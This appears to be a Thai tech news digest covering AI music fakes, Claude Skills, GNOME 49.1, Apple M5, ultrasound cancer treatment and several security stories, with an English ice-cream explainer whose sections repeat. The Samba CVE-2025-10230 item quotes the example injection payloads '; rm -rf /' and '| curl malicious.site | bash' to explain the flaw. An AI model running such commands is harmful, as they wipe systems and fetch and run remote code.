เนื้อเพลงสร้างจาก prompt เช่น “Your story’s written in the stars”
AI music generators อย่าง Suno สร้างเพลงจากข้อความได้ภายในวินาที
YouTube มีนโยบายให้เปิดเผยการใช้ AI แต่หลายคลิปซ่อนข้อมูลไว้
คลิปเหล่านี้มีผู้ชมหลายล้านและคอมเมนต์ขอบคุณศิลปินที่ไม่ได้ร้องจริง
Alex Mahadevan เตือนว่าอินเทอร์เน็ตกำลังถูกแทนที่ด้วย “AI slop”
Lucas Hansen เสนอให้คุ้มครองเสียงและภาพของบุคคล แม้จะเสียชีวิตแล้ว
The Velvet Sundown วง AI บน Spotify มีผู้ฟังเกิน 200,000 คน
Suno เสนอ prompt เช่น “เพลงแจ๊สเกี่ยวกับรดน้ำต้นไม้”

https://www.thestar.com.my/tech/tech-news/2025/10/17/youtube-users-trip-over-fake-ai-tributes-to-charlie-kirk

“5 วิธีแปลงเคสคอมเก่าให้กลายเป็นของใช้สุดเจ๋ง” — จากสวนพกพาไปจนถึงเตาย่างบาร์บีคิว

หากคุณมีเคสคอมพิวเตอร์เก่าที่ไม่ได้ใช้งานแล้ว อย่าเพิ่งรีบเอาไปทิ้ง! บทความจาก SlashGear แนะนำ 5 วิธีสุดสร้างสรรค์ในการนำเคสเก่ากลับมาใช้ใหม่ ไม่ว่าจะเป็นของตกแต่งบ้านหรืออุปกรณ์ใช้งานจริง โดยอาศัยความแข็งแรงของโครงสร้างเหล็กและพื้นที่ภายในที่ดัดแปลงได้หลากหลาย

ไอเดียแปลงเคสคอมเก่า
1. สวนพกพา (Portable Garden)
   - ติดตั้งหลอดไฟปลูกต้นไม้และพัดลมระบายอากาศ
  - ใช้ Mylar สะท้อนแสงภายใน และวางกระถางต้นไม้ขนาดเล็ก
  - เหมาะกับคนอยู่คอนโดหรือไม่มีพื้นที่ปลูกต้นไม้

2. ตู้จดหมายแนวไอที (Novelty Mailbox)
  - ถอดชิ้นส่วนภายใน ติดตั้งฐานรอง และเจาะช่องรับจดหมาย
  - ถ้าเคสมีช่อง CD-ROM เดิม ก็ใช้เป็นช่องรับจดหมายได้เลย
  - สร้างความโดดเด่นให้หน้าบ้านแบบ geek ๆ

3. ชั้นวางของติดผนัง (Stackable Shelving)
  - ถอดแผงด้านข้างและยึดเคสเข้ากับผนัง
  - วางซ้อนกันหลายเคสเพื่อสร้างชั้นวางแบบโมดูลาร์
  - ใช้เก็บหนังสือ ของตกแต่ง หรืออุปกรณ์อิเล็กทรอนิกส์

4. กล่องเก็บเครื่องมือ (Tool Storage)
  - ใช้พื้นที่ภายในติดกล่องเก็บของขนาดเล็ก
  - ดัดแปลงให้มีลิ้นชักเลื่อนออกด้านหลัง
  - ติดสายสะพายเพื่อพกพาไปใช้งานนอกสถานที่

5. เตาย่างบาร์บีคิว (Portable BBQ Grill)
  - วางถ่านในแนวนอน ติดตั้งตะแกรงย่างด้านบน
  - ใช้พัดลมของเคสควบคุมอุณหภูมิ
  - เหมาะกับการตั้งบนโต๊ะที่รองด้วยฟอยล์กันความร้อน

https://www.slashgear.com/1999044/5-unexpected-uses-old-pc-towers/

“Claude Skills โดย Anthropic” — สร้าง AI ที่รู้จริงในงานของคุณ ด้วยระบบเสริมความสามารถแบบกำหนดเอง

Anthropic เปิดตัว “Claude Skills” ซึ่งเป็นระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น โดยใช้โครงสร้างแบบ “skill folder” ที่บรรจุคำสั่ง, สคริปต์ และไฟล์ที่จำเป็น Claude จะโหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจนั้น ๆ เพื่อให้ทำงานเร็วและแม่นยำ

Claude Skills ทำงานได้กับทุกผลิตภัณฑ์ของ Claude — ทั้ง Claude apps, Claude Code และ API โดยผู้ใช้สามารถสร้าง skill เองได้ผ่าน “skill-creator” ซึ่งเป็น skill พิเศษที่ช่วยตั้งโครงสร้างโฟลเดอร์, เขียนไฟล์ SKILL.md และจัดการ resource โดยไม่ต้องแก้ไขไฟล์ด้วยตนเอง

ฟีเจอร์เด่นของ Claude Skills:

Composable: Claude สามารถใช้หลาย skill พร้อมกันและประสานการทำงานอัตโนมัติ
Portable: สร้างครั้งเดียว ใช้ได้ทุกแพลตฟอร์มของ Claude
Efficient: โหลดเฉพาะข้อมูลที่จำเป็นเท่านั้น
Powerful: skill สามารถมีโค้ดที่รันได้จริง ไม่ใช่แค่ข้อความคำสั่ง

ในฝั่งนักพัฒนา API มี endpoint ใหม่ /v1/skills สำหรับจัดการเวอร์ชัน skill และต้องเปิดใช้ Code Execution Tool beta เพื่อให้ Claude รันโค้ดได้อย่างปลอดภัย

องค์กรต่าง ๆ เช่น Box, Notion, Canva และ Rakuten ได้ใช้ Claude Skills เพื่อปรับแต่งการทำงานให้ตรงกับบริบทของตน เช่น สร้างเอกสารตามมาตรฐานองค์กร, ทำงานร่วมกับ Notion ได้เร็วขึ้น, หรือวิเคราะห์ spreadsheet ทางบัญชีได้แม่นยำ

ข้อมูลในข่าว
Claude Skills คือระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น
ใช้โครงสร้าง skill folder ที่มีคำสั่ง, สคริปต์ และ resource
Claude โหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจ
ใช้ได้กับ Claude apps, Claude Code และ API
“skill-creator” ช่วยสร้าง skill ได้แบบ interactive โดยไม่ต้องแก้ไฟล์เอง
Claude สามารถใช้หลาย skill พร้อมกัน (Composable)
สร้าง skill ครั้งเดียว ใช้ได้ทุกแพลตฟอร์ม (Portable)
โหลดเฉพาะข้อมูลที่จำเป็น (Efficient)
skill สามารถมีโค้ดที่รันได้จริง (Powerful)
API มี endpoint /v1/skills สำหรับจัดการ skill
ต้องเปิดใช้ Code Execution Tool beta เพื่อรันโค้ด
Box ใช้ Claude สร้างเอกสารจากไฟล์ที่เก็บไว้
Notion ใช้ Claude เพื่อลดการเขียน prompt ซับซ้อน
Canva ใช้ Claude เพื่อสร้างดีไซน์ตามบริบททีม
Rakuten ใช้ Claude วิเคราะห์ spreadsheet และสร้างรายงาน

https://www.anthropic.com/news/skills

“GNOME 49.1 มาแล้ว!” — อัปเดตครั้งใหญ่เพื่อความเสถียร ความเข้าถึง และประสบการณ์ผู้ใช้ที่ดีขึ้น

GNOME Project ได้ปล่อย GNOME 49.1 ซึ่งเป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia” โดยเน้นการแก้ไขบั๊กและปรับปรุงประสบการณ์ใช้งานในหลายส่วนของเดสก์ท็อป รวมถึง Nautilus, Epiphany, GNOME Shell, Mutter, Orca และ GNOME Software

การเปลี่ยนแปลงสำคัญ ได้แก่:
ปรับปรุง UI การจับภาพหน้าจอให้เข้าถึงง่ายขึ้น
รองรับการพิมพ์ภาษาฮินดีแบบ Bolnagri บนคีย์บอร์ดจอสัมผัส
ปรับปรุงไอคอนการเข้าถึงบนหน้าจอล็อกอิน
แก้ไขปัญหาการแจ้งเตือนอัปเดตใน GNOME Software
แก้ไขบั๊กที่ทำให้เกิด zombie process จาก gnome-session
แก้ไขปัญหาโฟกัสคีย์บอร์ดใน Activities Overview
แก้ไขปัญหา GTK popover submenu ที่ทำให้แอปค้าง
แก้ไขปัญหาหน้าต่าง maximized ล้นใต้ panel
แก้ไขการสลับ layout คีย์บอร์ดผ่าน xkb-options

ใน Nautilus (Files):
แก้ไขการ crash จาก callback ภายใน
แก้ไขการ paste รูปภาพขนาดใหญ่
ปรับปรุง contrast ของรายการที่ถูก cut
แก้ไขการโฟกัสในหน้าต่างเลือกแอปเริ่มต้น
แก้ไข sidebar drag-and-drop และการทดสอบ archive ที่ใช้เวลานาน

ใน Epiphany (GNOME Web):
ปรับปรุง address bar และ dropdown behavior
แก้ไขการแสดงผลตัวอักษร non-Latin
เพิ่ม OpenSearch ให้ DuckDuckGo, Bing และ Google
แก้ไข caret position หลัง Ctrl+K
แก้ไข favicon ที่มีพื้นหลังดำให้โปร่งใส

ใน Orca (screen reader):
เพิ่มการควบคุม caret สำหรับทุก text object
เพิ่มคำสั่งใหม่ผ่าน D-Bus Remote Controller
ปรับปรุงการอ่าน voice name และการจัดเรียงใน Preferences
เพิ่ม OnlyShowIn=GNOME ให้ Orca autostart ได้ในเวอร์ชันเก่า

GNOME Control Center ก็ได้รับการปรับปรุงหลาย panels เช่น Appearance, Date & Time, Mouse, Network, Users และ Wacom ส่วน GNOME Display Manager (GDM) ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง และการตรวจสอบ Wayland ที่ผิดพลาด

ข้อมูลในข่าว
GNOME 49.1 เป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia”
ปรับปรุง accessibility, multi-touch, และการจัดการคีย์บอร์ด
แก้ไข zombie process จาก gnome-session
Nautilus ได้รับการแก้ไขหลายจุด เช่น paste รูปภาพ, contrast, drag-and-drop
Epiphany ปรับปรุง address bar, dropdown, และรองรับ OpenSearch
Orca เพิ่ม caret navigation และปรับปรุง voice name presentation
GNOME Software แก้ไขการแจ้งเตือนอัปเดต
GNOME Control Center ปรับปรุงหลาย panels
GDM ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง

https://9to5linux.com/gnome-49-1-desktop-released-with-various-improvements-and-bug-fixes

“ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน

ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf

ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash

เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที

ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ

ทีม Samba แนะนำให้ผู้ดูแลระบบ:
ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf
ปิดการใช้งาน WINS server (wins support = no)
อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9

ข้อมูลในข่าว
ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม
เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell
ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน
มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook”
WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ
NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้
Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ
วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no)
เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9
“wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต

https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/

“Flax Typhoon ฝัง Web Shell ใน ArcGIS SOE” — แฮกเกอร์จีนเข้าถึงระบบนานกว่า 1 ปีโดยใช้ซอฟต์แวร์ที่เชื่อถือได้เป็นช่องทางลับ

กลุ่มแฮกเกอร์ที่ได้รับการสนับสนุนจากรัฐบาลจีนชื่อ “Flax Typhoon” หรือ “Ethereal Panda” ถูกเปิดโปงว่าใช้เทคนิคใหม่ในการแทรกซึมระบบองค์กรผ่าน ArcGIS โดยเปลี่ยน Java Server Object Extension (SOE) ที่ถูกต้องตามมาตรฐานให้กลายเป็น Web Shell แบบลับ ซึ่งสามารถควบคุมระบบได้โดยไม่ถูกตรวจจับ

การโจมตีนี้กินเวลานานกว่า 12 เดือน โดยแฮกเกอร์ฝัง SOE ที่มี access key แบบ hardcoded ลงในระบบ และฝังไว้ในไฟล์ backup เพื่อให้กลับมาได้แม้ระบบจะถูกกู้คืนแล้วก็ตาม

หลังจากเข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย พวกเขาใช้คำสั่ง base64 ที่ดูเหมือนคำสั่งปกติของ ArcGIS เพื่อหลบเลี่ยงการตรวจสอบ และใช้ API ของ ArcGIS ในการรันคำสั่ง PowerShell สร้าง VPN bridge ลับผ่านไฟล์ “bridge.exe” ที่ถูกแปลงชื่อจาก SoftEther VPN

สุดท้าย Flax Typhoon พยายามเข้าถึง workstation ของ IT เพื่อขโมยข้อมูลจาก SAM และ LSA โดยใช้ RemoteRegistry และสร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน

ReliaQuest ซึ่งเป็นผู้เปิดเผยการโจมตีนี้ ระบุว่า Flax Typhoon มีแนวโน้มจะยังคงแฝงตัวอยู่ในเครือข่ายอื่น ๆ และมักทำงานในช่วงเวลาตรงกับเวลาทำการของจีน (00:00–06:00 UTC)

ข้อมูลในข่าว
Flax Typhoon เป็นกลุ่ม APT ที่ได้รับการสนับสนุนจากรัฐบาลจีน
ใช้ ArcGIS SOE ที่ถูกต้องตามมาตรฐานแปลงเป็น Web Shell
Web Shell มี access key แบบ hardcoded และฝังใน backup เพื่อความคงอยู่
เข้าถึงระบบผ่านบัญชีผู้ดูแล ArcGIS ที่ถูกขโมย
ใช้คำสั่ง base64 ผ่าน API เพื่อหลบเลี่ยงการตรวจจับ
สร้าง VPN bridge ลับผ่านไฟล์ bridge.exe ที่แปลงชื่อจาก SoftEther VPN
พยายามเข้าถึง workstation ของ IT เพื่อขโมย SAM และ LSA secrets
สร้างไฟล์ pass.txt.lnk เพื่อเก็บรหัสผ่าน
ReliaQuest ระบุว่า Flax Typhoon มีแนวโน้มยังแฝงตัวในเครือข่ายอื่น
เวลาทำงานของกลุ่มตรงกับเวลาทำการของจีน (00:00–06:00 UTC)

https://securityonline.info/china-backed-flax-typhoon-apt-maintained-year-long-access-by-turning-arcgis-soe-into-web-shell-backdoor/

Gelato vs. Ice Cream vs. Frozen Yogurt vs. Sherbet vs. Sorbet: Get The Scoop On The Difference

You scream, I scream, we all scream for… wait, is that ice cream or gelato? Or frozen yogurt? And what’s the deal with sherbet and sorbet? Are all of these things ice cream, too?

Don’t get a brain freeze. We’ll break down the similarities and technical differences between these frozen treats—based on ingredients and how they’re made—in addition to dipping into the overlap of the terms in casual use.

Join as we serve up the answers to these questions and more:

What defines ice cream?
What is the difference between gelato and ice cream?
How is ice cream different from frozen yogurt?
Is sherbet a kind of ice cream?
What is the difference between sherbet and sorbet?
How is gelato different from sorbet?
What is the difference between sorbet and ice cream?

Quick summary

We casually call a lot of frozen treats ice cream. But according to US technical guidelines, ice cream must contain 10 percent milk fat. It’s typically made with milk, cream, flavorings, and sometimes egg yolk. Gelato is similar to ice cream but typically contains less cream and air. Frozen yogurt uses yogurt as its primary ingredient rather than milk and cream. Unlike ice cream, sherbet uses fruit juice or fruit purée as its main ingredient and typically only has a small amount of dairy. Sorbet also uses fruit juice or purée as its main ingredient, but it doesn’t contain any dairy products or eggs.

What is the difference between gelato and ice cream?

Generally, the term ice cream refers to a creamy frozen dessert that’s made with dairy fats, sugar, and sometimes egg yolks. However, ice cream is often casually used as a catchall term to refer to all kinds of frozen desserts, including many of the ones that we’ll compare here, some of which do not contain cream or any dairy products.

That being said, the definition of ice cream is often much more narrow in technical use. In fact, according to US law, in order for a food to be considered ice cream in the US it must contain at least 10 percent milk fat. The legal definition also touches on the inclusion of flavoring ingredients like sugar or artificial sweeteners and optional dairy products, such as cream, butter, buttermilk, and skim milk. Typically, egg yolks are also allowed as an ingredient. Ice cream typically contains a lot of cream in order to achieve the required milk fat percentage.

Gelato is an Italian-style dessert that usually contains many of the same ingredients as ice cream. It’s often considered a type of ice cream—sometimes referred to as “Italian ice cream.”

Compared to ice cream, though, gelato usually contains less cream and has a lower milk fat percentage. Additionally, the slower churning process of gelato causes it to be infused with less air than ice cream. All of this means that gelato tends to have a silkier texture than ice cream.

frozen yogurt vs. ice cream

Frozen yogurt (popularly nicknamed fro-yo) and ice cream are both typically made from dairy products and sugar. However, the main ingredients in ice cream are milk and cream and the main ingredient in frozen yogurt is, unsurprisingly, yogurt. Under certain technical requirements, ice cream must have at least 10 percent milk fat, but those requirements don’t apply to frozen yogurt. The fat percentage of frozen yogurt depends on what type of milk was used to make the yogurt in it.

Is sherbet ice cream?

Sherbet is a creamy frozen dessert made mainly from fruit juice or fruit purée—it typically contains only small amounts of dairy products, egg whites, and/or gelatin. (Sherbet is pronounced [ shur-bit ], but many people say [ shur-burt ], leading to spelling sherbert becoming increasingly common.)

Sherbet is technically not ice cream, even though they both can contain fruit and dairy products. The big difference is that sherbet’s main ingredient is fruit juice or purée, while ice cream’s main ingredients are typically milk and cream. Still, they’re close enough that many people likely consider sherbet a type of ice cream.

sherbet vs. sorbet

As we just learned, sherbet typically contains only a small amount of dairy products and/or eggs. Sorbet (pronounced [ sawr-bey ]) is a creamy frozen concoction made from fruit juice or fruit purée that does not contain any dairy products or eggs. Sorbet is usually a dessert, but not always—it’s sometimes served between courses as a palate cleanser.

The words look similar because they’re ultimately based on the same root—the Turkish şerbet, from the Persian sharbat, from the Arabic sharbah, meaning “a drink.”

gelato vs. sorbet

By now, you know that gelato traditionally uses milk and cream as its main ingredients, and that sorbet primarily contains fruit juice or fruit purée and does not use dairy products or eggs. Sorbet is less creamy.

sorbet vs. ice cream

The difference between ice cream and sorbet is also based on whether or not dairy is used. Technically speaking, ice cream always contains cream and/or milk as its main ingredients, while sorbet traditionally never includes dairy or eggs, instead being primarily made from fruit juice or fruit purée.

sherbet vs. sorbet

As we just learned, sherbet typically contains only a small amount of dairy products and/or eggs. Sorbet (pronounced [ sawr-bey ]) is a creamy frozen concoction made from fruit juice or fruit purée that does not contain any dairy products or eggs. Sorbet is usually a dessert, but not always—it’s sometimes served between courses as a palate cleanser.

The words look similar because they’re ultimately based on the same root—the Turkish şerbet, from the Persian sharbat, from the Arabic sharbah, meaning “a drink.”

gelato vs. sorbet

By now, you know that gelato traditionally uses milk and cream as its main ingredients, and that sorbet primarily contains fruit juice or fruit purée and does not use dairy products or eggs. Sorbet is less creamy.

sorbet vs. ice cream

The difference between ice cream and sorbet is also based on whether or not dairy is used. Technically speaking, ice cream always contains cream and/or milk as its main ingredients, while sorbet traditionally never includes dairy or eggs, instead being primarily made from fruit juice or fruit purée.

Get the inside scoop

Here’s the final scoop: All of these distinctions are traditional and technical. As more dairy-free options become available, you’re much more likely to see many of these names applied to frozen desserts that include some nontraditional ingredients. In the case of ice cream, for example, fat sources used for the base may include ingredients like coconut milk, oat milk, or avocado.

สงวนลิขสิทธิ์ © 2025 AAKKHRA & Co.

“Apple เปิดตัวชิป M5” — ก้าวกระโดดครั้งใหญ่ด้าน AI ด้วย GPU แบบใหม่และ Neural Accelerator ในทุกคอร์

Apple ประกาศเปิดตัวชิป M5 ซึ่งเป็นระบบบนชิป (SoC) รุ่นใหม่ที่ออกแบบมาเพื่อยกระดับการประมวลผลด้าน AI โดยเฉพาะ โดยนำมาใช้ใน MacBook Pro ขนาด 14 นิ้ว, iPad Pro และ Apple Vision Pro รุ่นล่าสุด

M5 ผลิตด้วยเทคโนโลยี 3nm รุ่นที่สาม และมาพร้อม GPU แบบ 10 คอร์ที่มี Neural Accelerator ฝังอยู่ในแต่ละคอร์ ทำให้สามารถประมวลผล AI ได้เร็วขึ้นกว่า M4 ถึง 4 เท่า และเร็วกว่า M1 ถึง 6 เท่า นอกจากนี้ยังมีการปรับปรุงด้านกราฟิกด้วย ray tracing รุ่นที่สาม และ dynamic caching รุ่นใหม่ที่ช่วยให้การเล่นเกมและการเรนเดอร์ภาพ 3D ลื่นไหลและสมจริงมากขึ้น

CPU ของ M5 มี 10 คอร์ (แบ่งเป็น 6 คอร์ประหยัดพลังงาน และ 4 คอร์ประสิทธิภาพสูง) ซึ่งให้ความเร็วในการประมวลผลแบบ multithreaded สูงกว่า M4 ถึง 15% พร้อม Neural Engine แบบ 16 คอร์ที่เร็วขึ้น และแบนด์วิดธ์ของ unified memory เพิ่มขึ้นเกือบ 30% เป็น 153GB/s

ชิป M5 ยังช่วยให้ Apple Vision Pro แสดงผลได้ละเอียดขึ้น 10% และเพิ่ม refresh rate สูงสุดถึง 120Hz ทำให้ภาพคมชัดและลดอาการเบลอจากการเคลื่อนไหว

Apple ยังเน้นว่า M5 จะช่วยให้การใช้งาน AI บนอุปกรณ์เป็นไปอย่างมีประสิทธิภาพมากขึ้น เช่น การสร้างภาพใน Image Playground, การใช้ Foundation Models framework และการประมวลผลโมเดลขนาดใหญ่แบบ on-device โดยไม่ต้องพึ่งคลาวด์

ข้อมูลในข่าว
Apple เปิดตัวชิป M5 สำหรับ MacBook Pro, iPad Pro และ Vision Pro
ผลิตด้วยเทคโนโลยี 3nm รุ่นที่สาม
GPU แบบ 10 คอร์มี Neural Accelerator ในทุกคอร์
ประสิทธิภาพ AI สูงกว่า M4 ถึง 4 เท่า และ M1 ถึง 6 เท่า
รองรับ ray tracing รุ่นที่สามและ dynamic caching รุ่นใหม่
CPU แบบ 10 คอร์ให้ความเร็ว multithreaded สูงกว่า M4 ถึง 15%
Neural Engine แบบ 16 คอร์ที่เร็วขึ้นและประหยัดพลังงาน
แบนด์วิดธ์ unified memory เพิ่มขึ้นเป็น 153GB/s
Vision Pro แสดงผลละเอียดขึ้น 10% และ refresh rate สูงสุด 120Hz
รองรับการใช้งาน AI แบบ on-device เช่น Image Playground และ Foundation Models

https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-the-next-big-leap-in-ai-performance-for-apple-silicon/

“รักษามะเร็งโดยไม่ต้องผ่าตัด — เมื่อคลื่นเสียงกลายเป็นอาวุธใหม่ที่แม่นยำและไร้แผล”

ในอดีต การรักษามะเร็งมักหมายถึงการผ่าตัด เคมีบำบัด หรือฉายรังสี ซึ่งล้วนมีผลข้างเคียงและความเสี่ยงสูง แต่วันนี้ นักวิทยาศาสตร์กำลังเปิดประตูสู่ยุคใหม่ของการรักษาแบบ “ไร้แผล” ด้วยเทคโนโลยีที่เรียกว่า “Focused Ultrasound” หรือคลื่นเสียงความเข้มสูงแบบเจาะจง

เทคโนโลยีนี้ใช้คลื่นเสียงที่แม่นยำในการทำลายเนื้อเยื่อมะเร็งโดยไม่ต้องเปิดผิวหนังหรือแทรกแซงอวัยวะใด ๆ คล้ายกับการใช้แว่นขยายรวมแสงอาทิตย์เพื่อเผาจุดเล็ก ๆ — แต่แทนที่จะใช้แสง ใช้คลื่นเสียงที่สามารถเจาะลึกถึงอวัยวะภายในได้อย่างปลอดภัย

การทดลองล่าสุดในสหรัฐฯ และยุโรปแสดงให้เห็นว่าเทคโนโลยีนี้สามารถใช้รักษามะเร็งตับ, ต่อมลูกหมาก, สมอง และแม้แต่มะเร็งเต้านมบางชนิดได้ โดยไม่ต้องผ่าตัดหรือพักฟื้นนาน ผู้ป่วยบางรายสามารถกลับบ้านได้ภายในวันเดียว

นอกจากการทำลายเนื้อเยื่อมะเร็งโดยตรงแล้ว คลื่นเสียงยังสามารถ “เปิดช่อง” ให้ยาเคมีบำบัดหรือภูมิคุ้มกันบำบัดเข้าสู่เนื้อเยื่อได้ดีขึ้น ซึ่งอาจเพิ่มประสิทธิภาพของการรักษาแบบผสม

“Focused Ultrasound” คือการใช้คลื่นเสียงความเข้มสูงแบบเจาะจง
ทำลายเนื้อเยื่อมะเร็งโดยไม่ต้องผ่าตัด

คลื่นเสียงสามารถเจาะลึกถึงอวัยวะภายในโดยไม่ทำลายเนื้อเยื่อรอบข้าง
คล้ายการใช้แว่นขยายรวมแสง แต่ปลอดภัยกว่า

ใช้รักษามะเร็งหลายชนิด เช่น ตับ, ต่อมลูกหมาก, สมอง, เต้านม
ผู้ป่วยบางรายกลับบ้านได้ภายในวันเดียว

คลื่นเสียงสามารถช่วยให้ยาเข้าสู่เนื้อเยื่อได้ดีขึ้น
เพิ่มประสิทธิภาพของเคมีบำบัดหรือภูมิคุ้มกันบำบัด

การรักษาแบบนี้ไม่ต้องใช้มีดผ่าตัดหรือการฉายรังสี
ลดผลข้างเคียงและความเสี่ยงจากการรักษาแบบเดิม

มีการทดลองในหลายประเทศ เช่น สหรัฐฯ, อังกฤษ, เยอรมนี
ผลลัพธ์เบื้องต้นเป็นบวกและปลอดภัย

เทคโนโลยีนี้ยังอยู่ในขั้นทดลองสำหรับบางชนิดของมะเร็ง
ยังไม่สามารถใช้แทนการรักษาแบบเดิมได้ทั้งหมด

ต้องใช้เครื่องมือเฉพาะและทีมแพทย์ที่มีความเชี่ยวชาญ
ไม่สามารถใช้ได้ในโรงพยาบาลทั่วไปทุกแห่ง

การรักษาอาจไม่เหมาะกับผู้ป่วยที่มีเนื้องอกในตำแหน่งลึกหรือใกล้โครงสร้างสำคัญ
เช่น ใกล้เส้นเลือดใหญ่หรือเส้นประสาท

ยังไม่มีข้อมูลระยะยาวเกี่ยวกับประสิทธิภาพและผลข้างเคียง
ต้องติดตามผลการทดลองเพิ่มเติมในอนาคต

https://www.bbc.com/future/article/20251007-how-ultrasound-is-ushering-a-new-era-of-surgery-free-cancer-treatment

“SVG Smuggling กลับมาอีกครั้ง — ล่อเหยื่อด้วยเอกสารปลอมจากศาลโคลอมเบีย ติดตั้ง AsyncRAT ผ่าน HTA file”

นักวิจัยด้านความปลอดภัยไซเบอร์ได้ตรวจพบแคมเปญโจมตีใหม่ที่ใช้เทคนิค “SVG Smuggling” ร่วมกับไฟล์ HTA (HTML Application) เพื่อแพร่กระจายมัลแวร์ควบคุมระยะไกลชื่อ AsyncRAT โดยแฮ็กเกอร์ใช้เอกสารปลอมที่ดูเหมือนเป็นหมายเรียกจากศาลโคลอมเบียเพื่อหลอกให้เหยื่อเปิดไฟล์ SVG ที่ฝังโค้ดอันตรายไว้

เมื่อเหยื่อเปิดไฟล์ SVG ที่แนบมาในอีเมล ฟังก์ชัน JavaScript ภายในจะถูกเรียกใช้เพื่อสร้างไฟล์ HTA ที่มีโค้ด PowerShell ซึ่งจะดาวน์โหลดและติดตั้ง AsyncRAT โดยไม่ต้องใช้ไฟล์แนบแบบ .exe หรือ .zip ที่มักถูกระบบอีเมลบล็อกไว้

AsyncRAT เป็นมัลแวร์ที่สามารถควบคุมเครื่องของเหยื่อจากระยะไกลได้อย่างสมบูรณ์ เช่น การบันทึกคีย์ การเปิดกล้อง การขโมยข้อมูล และการติดตั้งมัลแวร์เพิ่มเติม โดยมีการเข้ารหัสการสื่อสารเพื่อหลบเลี่ยงการตรวจจับ

การใช้ SVG Smuggling ถือเป็นเทคนิคที่ซับซ้อนและยากต่อการตรวจจับ เพราะไฟล์ SVG มักถูกมองว่าเป็นไฟล์ภาพธรรมดา และสามารถฝัง JavaScript ได้โดยไม่ถูกสแกนจากระบบป้องกันทั่วไป

ข้อมูลสำคัญจากข่าว
แฮ็กเกอร์ใช้เอกสารปลอมจากศาลโคลอมเบียเพื่อหลอกเหยื่อ
ใช้เทคนิค SVG Smuggling เพื่อฝังโค้ด JavaScript
JavaScript สร้างไฟล์ HTA ที่มี PowerShell สำหรับติดตั้ง AsyncRAT
AsyncRAT สามารถควบคุมเครื่องเหยื่อจากระยะไกล
การสื่อสารของ AsyncRAT ถูกเข้ารหัสเพื่อหลบเลี่ยงการตรวจจับ
SVG Smuggling เป็นเทคนิคที่ยากต่อการตรวจจับโดยระบบทั่วไป

ข้อมูลเสริมจากภายนอก
HTA file เป็นไฟล์ที่สามารถรันสคริปต์ได้โดยตรงใน Windows
PowerShell เป็นเครื่องมือที่ถูกใช้บ่อยในการโจมตีแบบ fileless
AsyncRAT เป็น open-source RAT ที่ถูกใช้ในหลายแคมเปญโจมตี
SVG Smuggling เคยถูกใช้ในแคมเปญโจมตี Microsoft 365 และ Google Workspace
การฝัง JavaScript ใน SVG สามารถหลบการสแกนของระบบอีเมลและ endpoint

https://securityonline.info/svg-smuggling-fake-colombian-judicial-lure-deploys-asyncrat-via-malicious-hta-file/

“ChaosBot: มัลแวร์สายลับยุคใหม่ ใช้ Discord เป็นช่องสั่งการ — เจาะระบบการเงินผ่าน VPN และบัญชีแอดมิน”

